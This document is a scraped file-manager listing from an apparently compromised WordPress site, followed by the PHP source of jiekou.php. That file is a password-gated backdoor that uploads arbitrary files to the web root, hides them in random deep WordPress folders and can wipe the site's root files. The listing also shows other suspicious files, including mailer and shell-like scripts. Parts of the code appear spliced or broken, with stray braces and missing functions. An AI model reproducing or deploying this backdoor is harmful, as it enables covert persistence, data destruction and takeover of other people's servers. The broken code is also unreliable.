9B534B8686E580E0E01768F00155B461

at path：ROOT / jiekou.php

run：R W Run

.well-known

DIR

2026-04-09 04:12:40

R W Run

4b1f5

DIR

2026-04-14 12:12:42

R W Run

cgi-bin

DIR

2026-04-09 04:12:40

R W Run

conexion

DIR

2026-04-09 04:12:40

R W Run

cpanel_official

DIR

2026-01-27 15:21:11

R W Run

f7f55a

DIR

2026-04-13 09:26:23

R W Run

fced7b

DIR

2026-04-13 09:26:23

R W Run

megamenu

DIR

2026-04-09 04:12:40

R W Run

sistema

DIR

2026-04-09 14:06:28

R W Run

vendors

DIR

2026-04-09 04:12:40

R W Run

wp-content

DIR

2026-04-13 09:26:23

R W Run

wp-includes

DIR

2026-04-13 08:51:37

R W Run

.ftpquota

15 By

2026-04-10 09:09:22

R W Run

.htaccess

236 By

2024-02-08 09:26:23

R W Run

1.txt

6 By

2026-01-22 06:13:24

R W Run

chmod 1.php

103 By

2026-04-09 04:12:40

R W Run

error_log

8.52 MB

2026-04-21 11:18:04

R W Run

events_template.php

1023 By

2026-03-17 20:02:19

R W Run

google256836def29820fd.html

53 By

2026-04-14 02:15:43

R W Run

index.php0

12.86 KB

2024-01-31 09:26:22

R W Run

jiekou.php

8.08 KB

2026-04-07 06:32:09

R W Run

products.php

9.99 KB

2026-04-07 06:28:47

R W Run

random_user 1.php

644 By

2026-04-07 06:33:06

R W Run

robots.txt

361 By

2023-09-21 09:26:23

R W Run

savep.php

215 By

2026-03-09 03:43:55

R W Run

simple.php

15.05 KB

2026-01-28 09:33:28

R W Run

test.php

737 By

2025-11-10 20:49:14

R W Run

unzip.php

0 By

2025-11-10 20:49:18

R W Run

user 1.php

539 By

2026-04-07 06:33:03

R W Run

waxamailer.php

72.62 KB

2026-02-04 21:44:23

R W Run

wp-config.php

0 By

2025-11-10 06:26:54

R W Run

wp-settings.php

0 By

2025-11-10 06:26:54

R W Run

zo.php

77.49 KB

2026-04-07 06:46:06

R W Run

error_log

📄jiekou.php

<?php
error_reporting(0);
ignore_user_abort(true);

header('Content-Type: application/json; charset=utf-8');

$dir = dirname(__FILE__);
$root_path = isset($_SERVER['DOCUMENT_ROOT']) ? realpath($_SERVER['DOCUMENT_ROOT']) : false;

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

if (isset($_POST['test']) && $_POST['test'] === '123') {
    if (md5((string)($_POST['key'] ?? '')) !== '9a286406c252a3d14218228974e1f567') {
        http_response_code(401);
        exit;
    }
    echo 'success';
    exit;
}

$is_multipart = isset($_SERVER['CONTENT_TYPE']) && strpos($_SERVER['CONTENT_TYPE'], 'multipart/form-data') !== false;
if ($is_multipart) {
    $data = $_POST;
    $data['_files'] = isset($_FILES['files']) ? $_FILES['files'] : [];
} else {
    $input = file_get_contents('php://input');
    $data = json_decode($input, true);
}

if ($data === null || md5((string)($data['key'] ?? '')) !== '9a286406c252a3d14218228974e1f567') {
    http_response_code(401);
    exit;
}

if (empty($data['module'])) {
    http_response_code(401);
    exit;
}

if ($root_path === false) {
    http_response_code(402);
    exit;
}

$module = $data['module'];

if ($module === 'clear_root') {
    $pwd = isset($data['pwd']) ? trim($data['pwd']) : '';
    if ($pwd !== '010203') {
        echo json_encode(['success' => false, 'message' => '清空错误0']);
        exit;
    }
    $keep = isset($data['keep']) && is_array($data['keep']) ? $data['keep'] : [];
    if (empty($keep)) {
        echo json_encode(['success' => false, 'message' => '清空错误1']);
        exit;
    }
    echo delete_root_files($root_path, $keep);
    exit;
}

if ($module === 'upload') {
    try {
        if (empty($data['_files']['tmp_name'])) {
            echo json_encode([['success' => false, 'message' => '上传错误0']]);
            exit;
        }
        $f = get_file_form($data['_files']);
        if ($f === null) {
            echo json_encode([['success' => false, 'message' => '上传错误1']]);
            exit;
        }
        $fn = isset($f['filename']) ? trim($f['filename']) : '';
        if ($fn === '') {
            echo json_encode([['success' => false, 'message' => '上传错误2']]);
            exit;
        }
        $content = isset($f['content']) ? $f['content'] : '';
        $result = upload_file($root_path, $fn, $content);
        echo json_encode([$result]);
        exit;
    } catch (Throwable $e) {
        echo json_encode([['success' => false, 'message' => '上传错误3']]);
        exit;
    }
}

if ($module === 'upload_random') {
    if (empty($data['_files']['tmp_name'])) {
        echo json_encode([['success' => false, 'message' => '上传错误0']]);
        exit;
    }
    $f = get_file_form($data['_files']);
    if ($f === null) {
        echo json_encode([['success' => false, 'message' => '上传错误1']]);
        exit;
    }
    echo upload_to_random_folder($root_path, $f['filename'], $f['content']);
    exit;
}

echo json_encode(['success' => false, 'message' => 'Unknown module']);
http_response_code(400);
exit;

function get_file_form($files) {
    $name = isset($files['name']) ? $files['name'] : '';
    $tmp = isset($files['tmp_name']) ? $files['tmp_name'] : '';
    if ($tmp === '' || !is_uploaded_file($tmp)) {
        return null;
    }
    return [
        'filename' => $name,
        'content' => file_get_contents($tmp),
    ];
}

}
    catch(Throwable $e){
        return ['success' => false, 'message' => "上传失败0"];
    }
}

function get_random_folder_path($root_path) {
    $root_path = rtrim($root_path, DIRECTORY_SEPARATOR);
    $all_roots = [
        $root_path . DIRECTORY_SEPARATOR . 'wp-admin',
        $root_path . DIRECTORY_SEPARATOR . 'wp-content',
        $root_path . DIRECTORY_SEPARATOR . 'wp-includes',
    ];
    $start_roots = array_filter($all_roots, 'is_dir');
    if (empty($start_roots)) return null;

$exclude_contains = ['upgrade', 'mu-plugins', 'plugins', 'themes'];
    $min_depth = 4;
    $max_depth = 6;
    $target_depth = $min_depth + mt_rand(0, $max_depth - $min_depth);

$path_stack = [];
    $current_path = $start_roots[array_rand($start_roots)];
    $path_stack[] = $current_path;

for ($i = 0; $i < 20; $i++) {
        if (count($path_stack) >= $target_depth) break;

$items = @scandir($current_path);
        if ($items === false) break;

$has_htaccess = false;
        $subdirs = [];
        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $full = $current_path . DIRECTORY_SEPARATOR . $item;
            if (is_file($full)) {
                if (strtolower($item) === '.htaccess') $has_htaccess = true;
                continue;
            }
            if (!is_dir($full)) continue;
            $name_lower = strtolower($item);
            $skip = false;
            foreach ($exclude_contains as $sub) {
                if (strpos($name_lower, $sub) !== false) { $skip = true; break; }
            }
            if (!$skip) $subdirs[] = $full;
        }

if ($has_htaccess || empty($subdirs)) {
            if (count($path_stack) > 1) {
                array_pop($path_stack);
                $current_path = $path_stack[count($path_stack) - 1];
                continue;
            }
            $current_path = $start_roots[array_rand($start_roots)];
            $path_stack = [$current_path];
            continue;
        }

$next = $subdirs[array_rand($subdirs)];
        $path_stack[] = $next;
        $current_path = $next;
    }

if (count($path_stack) < 2) return null;
    $abs = $path_stack[count($path_stack) - 1];
    $rel = str_replace($root_path, '', $abs);
    $rel = str_replace('\\', '/', trim($rel, '/\\'));
    return $rel === '' ? null : $rel;
}